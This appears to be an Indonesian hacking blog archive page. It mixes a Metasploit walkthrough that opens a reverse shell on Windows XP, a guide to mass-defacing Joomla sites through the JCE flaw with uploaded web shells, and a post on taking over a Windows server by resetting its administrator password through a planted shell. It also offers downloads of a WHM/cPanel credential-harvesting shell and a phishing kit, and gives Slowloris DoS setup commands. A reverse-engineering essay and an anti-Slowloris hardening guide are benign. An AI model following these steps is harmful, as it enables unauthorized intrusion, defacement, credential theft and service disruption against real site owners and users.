Tampilkan postingan dengan label Hacking. Tampilkan semua postingan
Tampilkan postingan dengan label Hacking. Tampilkan semua postingan

Selasa, 05 November 2013

Exploit and Gain Remote Access to Windows XP (Metasploit)


Before we start hacking, let’s familiarize ourselves with Metasploit so that when I use certain terms, we all understand them to mean the same thing. When first looking at the Metasploit Framework, it can be a bit overwhelming with the various interfaces, options, utilities, and modules. Here we’ll try to make it understandable so that we can execute our first exploit.

Terminology

The following terminology is not only used within the Metasploit Framework, but throughout the professional hacking and penetration testing communities. As a result, any professional in this field should be familiar with these terms and be able to clearly distinguish them.
  • Exploit
Exploit is the means by which an attacker takes advantage of a flaw or vulnerability in a network, application, or service. The hacker uses this flaw or vulnerability in a way that the developer or engineer never intended, to achieve a desired outcome (e.g. root access). Some more common exploits that you’ve probably already heard of are SQL injections, buffer overflows, etc.
  • Payload
A payload is the program or code that is delivered to the victim system. Metasploit has pre-built payloads for this purpose included in the highly useful Meterpreter, or you can develop your own. This payload is designed to provide the attacker with some capability to manage or manipulate the target system for their particular needs.
  • Shellcode
This is a set of instructions used as a payload when the exploitation occurs. Shellcode is typically written in assembly language, but not necessarily always. It’s called “shellcode” because a command shell or other command console is provided to the attacker that can be used to execute commands on the victim’s machine.
  • Module
A module is a piece of software that can be used by the Metasploit Framework. These modules are interchangeable and give Metasploit its unique power. These modules might be exploit modules or auxiliary modules.
  • Listener
This is that component that listens for the connection from the hacker’s system to the target system. The listener simply handles the connection between these systems.
  • Show
Metasploit Framework has hundreds of modules and other utilities. As a result, you will not be able to remember them all. Fortunately, the show command can grab a listing of all modules, options, targets, etc. in your framework.
Now that we have the basics of Metasploit concepts and commands down, let’s hack a system!

Step 1: Getting Started

First, open a terminal in Linux.
One of the most reliable hacks is on the ubiquitous Windows XP system with the RPC DCOM. It’s a buffer overflow attack that enables the attacker to execute any code of their choice on the owned box (note Microsoft’s comment under impact of vulnerability). Microsoft identifies it as MS03-026 in their database of vulnerabilities. In our case, we will use it to open a reverse shell on our target system.

Open the the Metasploit console.
msfconsole
Be patient, it takes awhile for Metasploit to load all of its modules. The current version of Metasploit has 823 exploits and 250 payloads.

Step 2: Find the Exploit

Metasploit allows you to search using the search command. In our case, we are searching for a DCOM exploit, so we can simply type:
msf > search dcom




Step 3: Set the Exploit

Now let’s tell Metasploit what exploit we want to use. Type use and the name of our exploit, exploit/windows/dcerpc/ms03_026_dcom.
msf > use exploit/windows/dcerpc/ms03_026_dcom

Note that the prompt has changed and now reflects our chosen exploit.

Step 4: Set the Options

Now that we’ve chosen our exploit, we can ask Metasploit what our options are. By typing show options, Metasploit will list our options in executing this exploit.
msf > show options


Step 5: Set Remote Host

Metasploit will now ask us for the RHOST. This will be the IP address of the remote host or the machine we’re attacking. In our case, it’s 10.0.0.3. Use the actual IP address of the machine you are attacking. Tools such as nmap can help in identifying the IP address of the machine you are attacking. Notice in the picture above that Metasploit tells us that we will be using (binding) port 135.
msf > set RHOST 10.0.0.3
Step 6: Show Payloads
Next, we check to see what payloads are available for this exploit. Type show payloads at the Metasploit prompt:
msf > show payloads


Step 7: Set Payload

Now that we can see what payloads are available, we can select the generic/shell_reverse_tcp by using the Metasploit console set command. If successful, this will establish a remote shell on the target system that we can command.
msf > set PAYLOAD generic/shell_reverse_tcp


Step 8: Set Local Host

Now that we’ve chosen the exploit and the payload, we need to tell Metasploit the IP address of our attacking machine. In this example, our target system has an IP address of 10.0.0.6. Use the actual IP address of the system you are attacking. Tools such a nmap, can help you obtain IP addresses.
msf > set LHOST 10.0.0.6


Step 9: Exploit

Now we command Metasploit to exploit the system:
msf > exploit

Step 10: Open a Shell on the Hacked System

Type the command sessions –i 1 to open a command shell on the XP system that will appear on your Metasploit console.
sessions –i 1
To confirm that the command shell is on the Windows XP system, type dir to get a directory listing on the Windows XP system that you now own!
C: >dir
Congratulations! You have just hacked your first system using Metasploit!

Rabu, 16 Oktober 2013

Bypass RDP/RDC Windows



emm tadi sempet browsing nemu blog ini http://www.windows-commandline.com/enable-remote-desktop-command-line/ mayan lah buat bypass remote yang server nya nggk bisa di remote xixix
langsung aja mas e... sorry nggk bisa tambah gambar soalnya koneksi aku lagi kacaw
Langsung Pake Command di bawah ini:)) 
 untuk menonaktifkan nya
 untuk mengaktifkan Remote assistance
Biarpun hasil copas moga aja berguna hehehe mau bertanya ? comment aja mas bero

Exploit Lama Joomla JCE Ext

Setelah lama saya tidak posting deface, kali ini saya akan share trik deface yang akhir - akhir ini menjadi trik yang sering digunakan para defacer, simak seperti apa trik ini.

Ada 2 cara yang dapat kita gunakan, yaitu dengan JCE Exploiter yang versi .exe & yang versi .php
JCE Exploiter Versi .exe
  1. Download JCE Exploiternya disini
  2. Selesai download, anda cari target yang vuln menggunakan dork :
    inurl:index.php?option=com_jce
  3. Silahkan anda test satu persatu web dari hasil dork apakah web tersebut vuln atau tidak dengan mencopy url webnya, yaitu : www.site.com
  4. Buka JCE Exploiter yang tadi diunduh, lalu klik 2x pada JCE.exe


    5. Jika vuln, maka akan keluar url/link shell anda di kolom bawah seperti ini


    6. Anda copy link tersebut ke addressbar, maka akan muncul uploader untuk upload shell anda


7. Untuk membuka shellnya, tinggal rename url di bagian paling belakang, yaitu 3xp.php menjadi namashellanda.php

8. Maka muncul deh shell anda, eksekusi deh tuh web.

NB : Jika tidak bisa mengupload file php, maka anda coba saja upload file html/txt alias tidak bisa upload shell, hanya upload script deface saja

JCE Exploiter Versi .php

1. Download scriptnya disini

2. Selesai download, jangan dilupa diekstrak terlebih dahulu

3. Lalu anda upload file php tersebut pada web hosting anda/web hasil deface sebelumnya, atau anda bisa gunakan punya saya disini


4. Kemudian anda cari target yang vuln menggunakan dork :
inurl:index.php?option=com_jce

5. Nah anda isi deh kolom kolom kosong di JCE.php tadi
- Anda masukkan url target ke kolom "hostname", misal : www.site.com (tidak menggunakan http://)
- Anda masukkan path target ke kolom "path", misal : webnya www.site.com/v2/, maka pathnya /v2/ tapi jika tidak ada pathnya isi saja /
- "Please specify a file to upload" adalah untuk memilih shell anda yang akan diupload
- Kolom selanjutnya kosongi saja

6. Selanjutnya klik "start" dan proses exploitasi akan berjalan, jika berhasil maka dibawah akan muncul tulisan seperti ini


7. Nah anda copy link tersebut ke addressbar, maka shell kesayangan anda akan muncul. Silahkan deh dieksekusi.

NB : Jika tidak bisa mengupload file php, maka anda coba saja upload file html/txt alias tidak bisa upload shell, hanya upload script deface saja

SUMBER : http://ramadhanlmzero.blogspot.com/2013/07/cara-deface-web-dengan-exploit-jce.html

Mengambil hak akses windows server ( MALING )

hem hari hari ini panas sekali di tempat ku... server game ku udah aman tinggal update post di blog.. hehehe langsung aja ya teknik ini khusus windows server looh hehehhehe yuk kita langsung aja :) mas bero !ini simple kok gans heheheh langsung aja ya... pertama kita harus sudah punya target yang sudah di tanem shell xixixi inget WINDOWS SERVER ITU MEMILIKI WEBSERVER SENDIRI YAITU IIS SERVER !  tapi kalau iis server nggk di install mungkin dia pake apache atau litespeed dan semacamnya

Target Pertama Ku

Langsung Aja Kita Masuk Ke Shell Yang Sudah Aku Tanam :)
http://i.imgur.com/hvfpvUU.png

Setelah Kita Masuk Langsung Aja Check OS Server Nya :))
http://img690.imageshack.us/img690/9812/idgs.png 

Nah Setelah Itu Langsung Shell Command Check IP :)
http://i.imgur.com/zkqLdsx.png 

Kita Langsung Check Menggunakan RDP :))
http://i.imgur.com/c0e8sL4.png

Test Masukin IP nya :))
http://i.imgur.com/UkdY1xL.png 

Kalau Seperti Begini Berati Masuk :))
http://img853.imageshack.us/img853/9398/6c7z.png

nah Setelah itu Kita Check User Nya Aja Liat Di Gambar Berikut :))
Dengan Command net user 
http://img812.imageshack.us/img812/2756/55y1.png 

Nah Sekarang Langsung Ganti Pass Administrator Nya :))
Dengan Command  : 
net user namauser passwordbaru 
Contoh :
net user Administrador *di sembunyikan*
http://i.imgur.com/vV7kM6e.png 
 Berhasil ! Karna Server Ini memakai Bahasa Spanyol Mungkin hehehe
*Se ha completado el comando correctamente.
yang Artinya 
*Dia telah menyelesaikan perintah berhasil.( indo )
*He has completed the command successfully. ( ing )

Sesudah Di ganti pass nya langsung aja connect *_*
http://i.imgur.com/jcTIaTo.png  

jika menemukan informasi sertifikat ! klik ok aja say 
 

Setelah Di Klik Ok Tunggu Loading Connect nya 
http://img51.imageshack.us/img51/5656/j2l7.png 

Berhasil Ciat Ciat !
 http://i.imgur.com/dsGhskN.png 

SELAMAT ANDA MENJADI TELAH MENJADI MALING ! ATAU BISA DI SEBUT JUGA BAJINGAN hehhehe
 
udah dulu ah capek ngetik 
tunggu update lain selanjut nya :) target sih update cara teknik rooting dan mengambil hak akses linux server tapi nanti :))

Download Shell B374k : http://code.google.com/p/b374k-shell/

Selasa, 15 Oktober 2013

Download Mannu Auto Mass WHM exploiter

"Mannu, auto massa WHM exploiter" php hacking shell siap dan tersedia untuk di-download umum.

Dengan menggunakan Script ini, Anda bisa mendapatkan semua WHM & cPanel server dengan satu klik. Anda tidak perlu untuk tersambung ke mendapatkan MYSQL Database untuk mendapatkan password.

Fuctions Khusus dari Shell ini
  1. Fasilitas Auto symlink ke file konfigurasi symlink whmcs dan kemudian memanfaatkan whmcs symlinked semua untuk ambil whm info dari database dengan sendirinya
  2. Anda dapat memilih baik untuk menampilkan whm info, info besar cpanels atau keduanya dengan cek yang menandai
  3. symlinker mode aman yang akan symlink whmcs file konfigurasi jika mode aman

Membahas Tentang Reverse Enginering

Konsep Reverse Engineering sebenarnya merupakan konsep yang telah lama, yakni sebuah proses analisis suatu sistem guna mendapatkan informasi mengenai identifikasi sistem, komponen sistem, dsb yang goalnya adalah menyajikan informasi tsb ke dalam bentuk abstraksi yang lebih tinggi, yakni lebih dimengerti oleh manusia. Nah  yang menjadi menarik adalah ketika beberapa litelatur menyajikan teknik reverse engineering dalam konsep masing-masing dengan segala kelebihan dan kekuranganya. artikel ini saya tulis bersumber pada papper Chih-Wei Lu tentang reverse engineering. paper ini menggambarkan proses reverse engineering dalam empat tahapan yakni : diawali proses context parsing, componenn analyzing, design recovery dan design recontructing, dimana masing-masing proses memiliki fungsi dan tujuan yang nantinya akan berkesinambungan dengan proses selanjutnya. agar lebih jelasnya silahkan baca artikel ini.

Software System telah menjadi bisnis penting bagi banyak perusahaan. Sekarang perusahaan mengandalkan lebih pada layanan yang diberikan oleh perangkat lunak, dan setiap kegagalan layanan ini akan memiliki konsekuensi serius pada operasi bisnis sehari-hari. Sistem ini biasanya besar dan kompleks, serta telah berevolusi selama puluhan tahun. Sehingga system yang demikian dikenal sebagai sistem warisan (Legacy System).

Sistem warisan perlu dipelihara dan dikembangkan karena berbagai faktor, termasuk kesalahan, koreksi, perubahan persyaratan, perubahan aturan bisnis, struktur organisasi yang berubah, dsb. masalah mendasar dalam mempertahankan dan mengembangkan sistem warisan adalah untuk memahami subjek sistem. Namun, sebagian besar sistem warisan tidak didokumentasikan dengan baik. Sebagai sistem yang telah lama dikembangkan kebutuhan untuk dokumentasi yang sesuai dan pemahaman desain asli sangat penting sehingga modifikasi perangkat lunak dapat dibuat dengan benar.

Reverse engineering adalah proses menganalisis sistem subjek untuk mengidentifikasi sistem, komponen dan antar hubungan mereka, dan menciptakan representasi sistem dalam bentuk lain atau tingkat abstrasksi yang lebih tinggi. Reverse engineering melibatkan identifikasi atau recovery dari kebutuhan program dan / atau spesifikasi desain yang dapat membantu dalam memahami dan memodifikasi program. Tujuan utama adalah untuk menemukan fitur yang mendasari sistem, termasuk persyaratan, spesifikasi, desain dan implementasi. Dengan kata lain, reverse engineering itu ditujukan untuk memulihkan dan mencatat informasi tingkat tinggi tentang sistem, termasuk:
  • Struktur sistem - komponen dan antar hubungan mereka, seperti yang diungkapkan oleh antarmuka;
  • fungsionalitas - operasi apa yang dilakukan pada komponen apa;
  • perilaku dinamis - Sistem pemahaman tentang bagaimana input diubah menjadi output;
  • Alasan - desain melibatkan pengambilan keputusan antara sejumlah alternatif pada setiap langkah desain
  • konstruksi - modul, dokumentasi, test suite, dll.

Beberapa tujuan untuk melakukan reverse engineering dapat diklasifikasikan ke dalam beberapa klasifikasi

  •  masalah kualitas (quality issues), seperti penyederhanaan perangkat lunak yang rumit, meningkatkan kualitas perangkat lunak yang mengandung kesalahan, penghapusan efek samping dari perangkat lunak, dll.
  • masalah pengelolaan (management issues), seperti membuat standar pemrograman, memfasilitasi teknik manajemen pemeliharaan perangkat lunak dengan lebih baik, dan sebagainya.
  • Masalah teknis (technical issues), seperti memungkinkan perubahan dalam perangkat lunak, menemukan dan merekam desain sistem,  menemukan dan merepresentasikan model bisnis yang ada dalam perangkat lunak, dll.

Tanpa dukungan Sarana yang tepat, biaya reverse engineering sistem perangkat lunak sangat tinggi. Tools Reverse engineering menyediakan mekanisme untuk ekstraksi data, Penciptaan model, visualisasi, dan penjelasan untuk membantu pemrogram untuk memahami sebuah sistem software.


Karakteristik / Masalah
Reverse Engineering adalah sebuah proses yang merupakan kebalikan dari Forward Engineering, untuk memahami kegiatan reverse engineering terlebih dahulu kita harus memahami tentang forward engineering, sebagai contoh forward engineering dapat kita lihat pada model pengembangan waterfall dimana pengembangan perangkat lunak disusun melalui proses analisa persyaratan, arsitektur desain, desain system, implementasi system.



Selama proses pengembangan system kemungkinan dapat terjadi bahwa suatu informasi dalam desain yang mungkin tidak didukung oleh bahasa pemrograman tertentu menjadi hilang dalam arti system menjadi kehilangan informasi tertentu. kesulitan utama dalam pemeliharaan dan evolusi sistem warisan adalah memulihkan informasi yang hilang
tersebut.

Forward Engineering selalu diakhiri dengan sebuah produk sedangkan reverse engineering dimulai dengan produk dalam hal ini perangkat lunak seperti system warisan (legacy system). Suatu system perlu di reverse kembali ketika sistem tidak dapat meminimalkan biaya, tidak mampu mengakomodasi perubahan fungsional sehingga apabila tidak segera diperbaiki akan menimbulkan resiko baru, atau karena kebutuhan lingkungan. Kita melakukan reverse engineering dapat dikarenakan beberapa hal sebagai berikut :
  • System Understanding (pemahaman thd system)
  • Basis for maintenance and redevelopment (dasar untuk pemeliharaan dan pembangunan kembali)
  • Reuse of component (penggunaan kembali komponen)
Yang pasti bahwa titik awal untuk reverse engineering adalah untuk memahami kode, berlawanan dengan proses pengembangan dan perbaikan, reverse engineering mencoba menelusuri kembali rute dan menemukan data asli yang telah hilang selama implementasi. Source code dan dokumentasi system yang ada merupakan sumber lain yang dapat memberikan informasi desain penting. Baru baru ini notasi visual seperti kelas diagram dalam UML merupakan representasi dokumen selama pengembangan sistem menggunakan teknologi yang lebiah modern seperti paradigma berorientasi objek atau pemrograman berorientasi objek. Namun sebagian besar system warisan sangat miskin dokumentasi atau memiliki dokumentasi yang kurang lengkap, jika tidak ada maka reverse engineering akan memakan waktu. Beberapa hal yang menyebabkan reverse engineering dari system warisan sangat sulit antaralain : pemrograman yang tidak konsisten, kurangnya staff yang mengerti computer atau bahasa pemrograman, dokumentasi yang kurang memadahi atau out of date, data  tidak akurat atau tidak lengkap
Factor yang mempengaruhi biaya reverse engineering antaralain :
  1. kualitas perangkat lunak yang akan di reverse
  2. ketersediaan alat dan dukungan
  3. apabila diperlukan konversi data
reverse engineering memungkinkan kita untuk mengidentifikasi komponen sistem dan menciptakan representasi ke tingkat yang lebih tinggi dari system. Kita bisa melihat hal ini lebih baik dengan menggambarkan proses yang digunakan dalam reverse engineering.

Proses Reverse Engineering
Dalam bagian ini akan dibahas tentang proses reverse engineering dan kegiatan dari setiap tahapan proses. Proses reverse engineering dapat dibagi menjadi empat fase : Context Parsing, Component Analyzing, Design Recovering dan Design Reconstructing.




Context Parsing
Tahap pertama adalah analisis source code, ekstrak sintaksis dan semantik informasi program. Dalam tahap ini teknik yang dilakukan adalah mem-parsing kode sumber dan kemudian mengubah kode ke representasi yang lebih terstruktur sebagai bentuk peralihan misalkan pengubahan source code dari bahasa mesin ke bahasa tingkat rendah.

Component Analyzing Phase

Fase ini mengambil struktur intermediate program untuk memperlihatkan artifak komponen. Artifak termasuk bagan struktur, variabel / attribut, fungsi informasi, program slice, grafik, data flow, dan kontrol dependensi. Banyak peneliti telah menyediakan pendekatan dan tools untuk berhasil memperoleh data flow diagram, diagram alir / flowchart dan informasi terkait selama tahap ini. Namun informasi tingkat tinggi yang tertanam pada source code aslinya tidak mudah untuk ditemukan. Sebagian besar teknologi reverse engineering menyediakan alat atau metodologi yang sistematis untuk mendukung tahap ini.

Design and Recovering Phase
Salah satu hambatan utama untuk membangun tools otomatis untuk ekstraksi desain dan domain pengetahuan dari program adalah pengetahuan yang implisit dari penyebaran informasi di seluruh kode. Pendek kata mengekstraksi original requirement dan atau design knowledge dari source code selalu menjadi masalah yang sulit. Dan biasanya untuk hal ini ditangani dalam domain para ahli. Saat ini dengan teknik yang menggabungkan struktural dan representasi, penganalisa dapat menyimpulkan beberapa informasi dalam level yang lebih tinggi,

Design Reconstructing phase
Pada tahap ini, model sistem dan spesifikasi desain yang diperoleh dari fase terakhir dapat dilihat lebih jauh dan terpadu untuk merekonstruksi pandangan yang tepat dari model desain. Desain model tidak hanya menawarkan fungsi dan perilaku sistem, tetapi juga arsitektur yang benar yang dapat terdistorsi dalam implementasi. Dengan struktur desain model yang baik, pemeliharaan perangkat lunak yang efektif dan pengembangan ulang perangkat lunak dapat diproses.

Teknik dan Tools
Bagian selanjutnya  akan membahas beberapa teknik dan peralatan / tools yang digunakan untuk melaksanakan proses reverse engineering. Tema-tema tersebut akan dibagi dalam tiga bagian :
  1. meyajikan skenario dalam penelitian dan teknik reverse engineering, 
  2. memilih dan mengenalkan aplikasi atau tools yang akan digunakan, 
  3. mengindikasikan kemungkinan penelitian di masa mendatang yang akan menghasilkan teknik baru dan tools untuk reverse engineering.
  • Skenario Penelitian dan Teknik Reverse EngineeringBagian ini menyajikan klasifikasi dari penelitian reverse engineering yang ada, penelitian pada masing-masing kategori biasanya melibatkan satu atau lebih fase reverse engineering, digambarkan pada gambar dibawah ini. 
Penelitian dan keterlibatan fase reverse engineering
Penelitian dan keterlibatan fase reverse engineering

Program Understanding
Pemahaman program bertujuan untuk memfasilitasi pemahaman terhadap sistem komputasi dengan examinasi code (pemerikasaan kode). Informasi yang berguna tersebut di ekstraksi dan disajikan dalam gaya dan aturan sesuai kognisi manusia. Selain merupakan bagian ilmu komputer. Pemahaman program dimulai dari tingkat kode sumber atau source code.

Specification recovery

Spesifikasi pemulihan bertujuan untuk mengekstraksi deskripsi syarat fungsional dan nonfungsional dari suatu sistem. Deskripsi ini dibuat dalam domain aplikasi.dari sudut pandang proses, spesifikasi pemulihan harus dilakukan dengan cara bottom-up karena satu-satunya informasi yang dapat diandalkan dari sistem warisan adalah kode sumbernya. Untuk mendukung proses bottom-up maka metode dan alat-alat / tools berguna untuk menghasilkan model abstrak dari kode sumber, sebagai contoh model deskripsi formal dalam bahasa formal yang sesuai. Teknik visualisasi software dapat juga digunakan untuk memberikan pandangan yang lebih intuitif dari sebuah sistem.

Design Recovery
Tujuan dari area penelitian ini adalah untuk mendapatkan gambaran desain dari kode sumber. Terdapat beberapa strategi untuk mencapai hal ini salah satunya adalah metode dasar. Dalam metode ini komputer hanya mengambil informasi yang seluruhnya berasal dari kode sumber. Metode yang lain adalah metode berbasis pengetahuan, dimana tool-tool bertujuan untuk membuat abstraksi secara otomatis atau semi-otomatis, tools tersebut menganalisa source code dengan menggunakan informasi pada knowledge base.

Architecture Recovery
Tujuan dari area penelitian ini adalah untuk mengekstraksi arsitektur sistem warisan dari source code dan dokumentasi, karena arsitektur akan memberikan gambaran luas dari seluruh sistem. Dengan semakin populernya sistem berbasis komponen dan sistem terdistribusi membutuhkan teknik yang lebih mahir untuk arsitektur pemulihan (architecture recovery).

Businnes rules extraction  
Para peneliti pada tema ini berpandangan bahwa sistem warisan memiliki aset yang berharga             didalamnya, yakni aturan bisnis organisasi. Mengekstraksi dan menggunakan kembali aturan tersebut sangat penting untuk evolusi sistem komputasi.

Cognitive processes in human program understanding
Masalah penelitian ini berfokus pada proses di mana manusia memahami kode sumber. Dengan bekerja sama dengan teknologi komputer, studi tentang proses-proses kognitif manusia dapat meningkatkan reverse engineering dengan membuat pendekatan dan alat yang lebih mendukung pemahaman manusia

Intermediate representation of source code
Intermediate representations digunakan untuk meningkatkan efisiensi dari rekayasa ulang suatu system besar. Source code di preprosses dan kemudian informasi program disimpan dalam intermediate representation. Query dalam intermediate representation akan lebih cepat diterima daripada query dari source code secara langsung.

Discovery of reusable components
Area penelitian ini bertujuan untuk mendapatkan kembali komponen-komponen reusable yang ada. Untuk mengetahui hubungan antar komponen serta kualitas komponen apabila akan di gunakan kembali. Isu penelitian pada area ini meliputi:
  1. criteria untuk mengevaluasi reusable komponen.
  2. proses untuk mengidentifikasi potensi resuable komponen
  3. bagaimana cara ekstraksi komponen secara tepat dan memahami komponen yang telah ditemukan.

Knowledge-based analysis
Sebagai kebutuhan untuk perangkat lunak rekayasa ulang meningkat secara dramatis, muncul kesadaran bahwa desain dari suatu tools perangkat lunak rekayasa ulang yang efektif harus cukup pintar sehingga domain pengetahuan yang sering digunakan dapat dipulihkan secara otomatis dari source code . ini mengarah ke trend  analisa berbasis pengetahuan untuk reverse engineering.

Tools
Beberapa tools sudah tersedia untuk beberapa area penelitian reverse engineering, tool-tool tersebut digambarkan pada tabel dibawah ini berdasarkan fungsinya dalam area penelitian.


Tools dan hubungan terkait dengan area penelitian
Area Penelitian Masa Mendatang
Masih ada studi yang akan dilakukan untuk membuat teknik reverse engineering menjadi lebih praktis. Kemungkinan wilayah penelitian antaralain :
Universal intermediary
Kebanyakan beberapa assistans tools reverse engineering menekankan tahapan dalam proses reverse engineering, dan biasanya menghasilkan hasil yang terkait dalam bentuk diagram yang mereka pahami sendiri. Meskipun beberapa representasi banyak digunakan namun belum ada standar yang diterima. Sehingga diperlukan perantara yang universal, XML (Extendsible Markup Language) mungkin menjadi calon perantara universal tersebut. XML memiliki fitur extendsibility, deskripsi struktur, dan validasi. Tujuan awal XML adalah untuk menyediakan sebuah format yang standar pada dokumen WWW. XML memungkinkan pengguna menentukan format dokumen sendiri dan menyajikan informasi suatu dokumen melalui standarisasi.

Dynamic analysis
Sebagian besar reverse engineering tools biasanya menganalisa program dalam bentuk static dan bukan perilaku dinamis program saat runtime, namun perilaku dinamis juga penting. Meningkatnya jumlah aplikasi berbasis website dan aplikasi berorientasi objek membuat isu analisa dinamis semakin penting.

New software technologies
Banyak teknologi perangkat lunak modern  diajukan untuk memcahkan masalah perkembangan perangkat lunak, seperti pengembangan berbasis komponen dan integrasi system, design pattern dan system objek terdistribusi. Aplikasi yang bertujuan untuk reverse engineering jenis ini masih jarang
Web Application
Aplikasi berbasis web sangat cepat popular dengan memanfaatkan teknologi Internet. Sehingga aplikasi berbasis web akan tumbuh sebagai sebagai target utama bagi reverse engineering generasi mendatang. Aplikasi berbasis web menghubungkan masing-masing sub-segmen dengan hyperlink
Referensi :

Chih-Wei Lu, *William C. Chu, Chih-Hung Chang,Yeh-Ching Chung, **Xiaodong Liu and Hongji Yang, “Reverse Engineering”

Abd-El-Hafiz, S; Basili, V.R., “Documenting Programs Using a Library of Tree Structured Plans”, Proceedings of the International Conference on Software Maintenance, IEEE Computer Society Press, pp. 152-161, 1993.

Anger, F.D.; Rodriguez, R.V.; Young, M., “Combining Static and Dynamic Analysis of Concurrent Programs”, Proceedings of the International Conference on Software Maintenance, IEEE Computer Society Press, pp. 89-98, 1995.

 Antonini, P.; Benedusi, P.; Cantone, G.; Cimitile, A., “Maintenance and Reverse Engineering: Low-Level Design Documents Production and Improvement”, Proceedings of the Conference on Software Maintenance, IEEE Computer Society Press , pp. 91-100, 1987.

 Bachman, R., A CASE for Reverse Engineering, Cahners Publishing Company, July 1988. Reprinted from DATAMATION.

Balmas, F., “Toward a Framework for Conceptual and Formal Outlines of Programs”, Proceedings of the Fourth Working Conference on Reverse Engineering, IEEE Computer Society, pp. 226-235, 1997.

Koleksi Phising Site ! Dari Anak SBH

Berkas:PhishingTrustedBank.pngDalam komputer, pengelabuan (Inggris: phishing) adalah suatu bentuk penipuan yang dicirikan dengan percobaan untuk mendapatkan informasi peka, seperti kata sandi dan kartu kredit, dengan menyamar sebagai orang atau bisnis yang tepercaya dalam sebuah komunikasi elektronik resmi, seperti surat elektronik atau pesan instan. Istilah phishing dalam bahasa Inggris berasal dari kata fishing ('memancing'), dalam hal ini berarti memancing informasi keuangan dan kata sandi pengguna.
Salinan halaman log-masuk Yahoo!di situs web Geocitie Dengan banyaknya kasus pengelabuan yang dilaporkan, metode tambahan atau perlindungan sangat dibutuhkan. Upaya-upaya itu termasuk pembuatan undang-undang, pelatihan pengguna, dan langkah-langkah teknis.
list di dalamnya !
  1. Yahoo
  2. WoW
  3. Twitter
  4. Steam
  5. Runescape
  6. Myspace
  7. Hotmail
  8. Gmail
  9. Facebook
Download :  http://www.mediafire.com/download/0kl6pv7m3aom68w/PhisingCollection.rar
Password :  WWW.SURABAYABLACKHAT.ORG

DDoS attacks: Block Slowloris HTTPD DDoS dengan mod_qos dan mod_antiloris

DDoS attack atau Denial of Service adalah sebuah serangan terhadap sebuah komputer atau server dalam jaringan internet, dengan tujuan menghabiskan sumber daya (resource) yang dimiliki oleh komputer tersebut sampai komputer yang di serang DDoS attack tidak dapat menjalankan fungsinya dengan sebagai mestinya, sehingga secara tidak langsung mencegah pengguna layanan untuk mendapatkan akses dari komputer yang di serang tersebut. Tulisan ini di tujukan untuk alternatife pencegahan DDoS Attack yang diakibatkan oleh Slowloris dimana pada tulisan sebelumnya telah di bahas HTTPd DDoS Attack dengan perl Slowloris

Di dalam system keamanan bawaan linux, sebenarnya untuk mencegah terhadap serangan DDoS attack ini dapat menggunakan Iptables atau software firewall secara default disertakan dalam kebanyakaan paket distribusi linux yang ada saat ini. Namun untuk pengguna awam seperti saya penggunaan firewall tersebut saya rasa sangat tidak efektif, karena biasanya serangan DDoS attack secara global adalah untuk menyerang beberapa service untuk dapat diakses publik.
DDoS Attack Penggunaan firewal dalam penggunaan kasus ini akan mem-block/reject service-service yang justru penting, karena firewall men-definisikan secara global port-port mana saja yang dapat di akses dari publik atau port-port mana saja yang tidak dapat diakses dari publik.
Dengan kebutuhan akan keamanan atas serangan DDoS attack tersebut khususnya service HTTPd/Apache , muncullah beberapa program yang dapat meminimalisir resiko dari serangan DDoS attack tersebut khususnya service web server (apache), saat ini program-program bermunculan antara lain mod_antiloris dan mod_qos. disini akan di jelaskan cara instalasi kedua program tersebut untuk RPM based (RHEL, CentOS, Fedora) untuk distro lain kemungkinan tidak jauh berbada proses instalasi dan penerapannya.

Instalasi dan konfigurasi mod_qos:
# yum install httpd-devel php-devel gcc pcre pcre-devel openssl-devel
# tar -xvzf mod_qos-10.15.tar.gz
# cd mod_qos-10.15/apache2
# apxs -i -c mod_qos.c -lcrypto -lpcre
Tambahkan konfigurasi untuk load module mod_qos di httpd.conf 

# vim /etc/httpd/conf/httpd.conf

# LoadModule qos_module /usr/lib/httpd/modules/mod_qos.so
# vim /etc/httpd/conf.d/qos.conf

Tambahkan kode berikut untuk qos.conf 
# QoS Settings<ifmodule mod_qos.c="">
# handles connections from up to 100000 different IPs
    QS_ClientEntries 100000
# will allow only 50 connections per IP
    QS_SrvMaxConnPerIP 50
# maximum number of active TCP connections is limited to 256
    MaxClients              256
# disables keep-alive when 70% of the TCP connections are occupied:
    QS_SrvMaxConnClose      180
# minimum request/response speed (deny slow clients blocking the server, ie. slowloris keeping connections open without requesting anything):
    QS_SrvMinDataRate       150 1200
# and limit request header and body (carefull, that limits uploads and post requests too):
# LimitRequestFields      30
# QS_LimitRequestBody     102400
</ifmodule>
atau jika anda ingin mng-compile mod_qos secara otomatis ditambahkan dan di load ke httpd.conf, compile dengan penambahan apxs -a seperti berikut:
# apxs -a -i -c mod_qos.c -lcrypto -lpcre
Berikut untuk tahapan instalasi mod_antiloris: 
# tar -xvjf mod_antiloris-0.4.tar.bz2
# apxs -a -i -c mod_antiloris.c
Untuk memeriksa apakah module tersebut sudah di tambahkan dalam load module apache gunakan perintah:
# httpd -M | grep qos_module
# httpd -M | grep antiloris_module
Hasil yang di dapat seperti berikut: 
Syntax OK
 antiloris_module (shared)
Syntax OK
 qos_module (shared)
Sebenarnya anda hanya cukup menggunakan salah satu dari module tersebut, untuk meminimalisir serangan yang terkait dengan HTTPD DDoS attack dan jika ada pertanyaan silahkan comment saja :)

Melakukan Dos Attack Memakai Slowloris Perl

Penetrasi kali ini akan sedikit meng-kilas balik penerapan HTTPd DDoS Attack dengan perl Slowloris, dimana DDoS attack kali ini untuk membanjiri service/resource HTTPd webserver suatu komputer/server. Namun tujuan dari dari tulisan ini hanya untuk pembelajaran semata, gunakan secara bijak, penulis tidak bertanggung jawab atas kerugian yang diakibatkan.
Tools yang akan digunakan kali ini adalah Slowloris HTTPd DDoS, bersumber pada bahasa perl yang di tulis oleh John Kinsella
http://ckers.org/slowloris. Keunggulan script tersebut untuk penetrasi DDoS Attack webserver mendukung IPv4 dan IPv6 pada service berikut: 
  • Apache 1.x
  • Apache 2.x
  • dhttpd
  • GoAhead WebServer
  • WebSense "block pages" (unconfirmed)
  • Trapeze Wireless Web Portal (unconfirmed)
  • Verizon's MI424-WR FIOS Cable modem (unconfirmed)
  • Verizon's Motorola Set-Top Box (port 8082 and requires auth - unconfirmed)
  • BeeWare WAF (unconfirmed)
  • Deny All WAF (unconfirmed)
Untuk dapat menggunakan tools/script tersebut download Slowloris.pl dan install dependensi yang di butuhkan.
# yum install perl perl-CPAN
Jika menggunakan opsi DDoS attack IPv4
# perl -MCPAN -e 'install IO::Socket::INET'
# perl -MCPAN -e 'install IO::Socket::SSL'
# wget http://ha.ckers.org/slowloris/slowloris.pl
Contoh penerapan DDoS Attack Slowloris IPv4
